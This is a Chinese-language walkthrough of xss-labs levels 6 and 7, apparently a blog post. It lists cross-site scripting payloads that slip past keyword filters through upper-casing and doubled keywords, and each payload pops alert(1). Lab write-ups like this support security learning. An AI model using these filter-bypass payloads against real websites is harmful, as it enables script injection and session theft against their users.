5、xss-labs之level6

一、level6-----大小写绕过

1、测试分析

测试了之前用过的payload,发现都不行,并且level4使用的Java伪协议也不行,可以得出<>、script、onclick都被过滤

2、构造payload

因为href被过滤,可以试一下大写HREF

初试payload:

"><a HREF=javascript:alert(1)>xss<a/>//

既然可以大写绕过,那payload就多了,只要能够将value或者input标签闭合并且大写就都可以

"><a HREF=javascript:alert(1)>超链接,并弹窗</a>//

"ONCLICK=alert(1)//

"ONCLICK="alert(1)

"><SCRIPT>alert(1)</SCRIPT>//

二、level7-----双写绕过

1、测试分析

测试过的额payload有:

"οnclick=alert(1)//

"οnclick="alert(1)

"><script>alert(1)</script>//

"><a href=javascript:alert(1)>超链接,并弹窗</a>//

传入payload后,查看源码发现,过滤的有

on

script

href

大小写

2、构造payload

可以采用双写绕过,payload:

"oonnclick=alert(1)//

"oonnclick="alert(1)

"><sscriptcript>alert(1)</sscriptcript>//

"><a hhrefref=javasscriptcript:alert(1)>超链接,并弹窗</a>//

总结:

1、绕过方法还可以使用大写绕过

2、将input标签或者value其中一个闭合就可以尝试插入xss

3、双写可以绕过过滤

相关推荐
前端工作日常4 分钟前
我学习到的AG-UI的概念
前端
韩师傅9 分钟前
前端开发消亡史:AI也无法掩盖没有设计创造力的真相
前端·人工智能·后端
XiaoYu200224 分钟前
第12章 支付宝SDK
前端
双向331 小时前
RAG的下一站:检索增强生成如何重塑企业知识中枢?
前端
拖拉斯旋风1 小时前
从零开始:使用 Ollama 在本地部署开源大模型并集成到 React 应用
前端·javascript·ollama
●VON1 小时前
跨模态暗流:多模态安全攻防全景解析
人工智能·学习·安全·von
asing1 小时前
🤯 为什么我的收银台在鸿蒙系统“第一次返回”死活拦不住?一次差点背锅的排查实录
前端·harmonyos
德育处主任1 小时前
『NAS』在群晖部署图片压缩工具-Squoosh
前端·javascript·docker
Hao_Harrision1 小时前
50天50个小项目 (React19 + Tailwindcss V4) ✨| ThreeDBackgroundBoxes(3D背景盒子组件)
前端·3d·typescript·react·tailwindcss·vite7
汤愈韬1 小时前
双向NAT
网络·网络协议·网络安全·security·huawei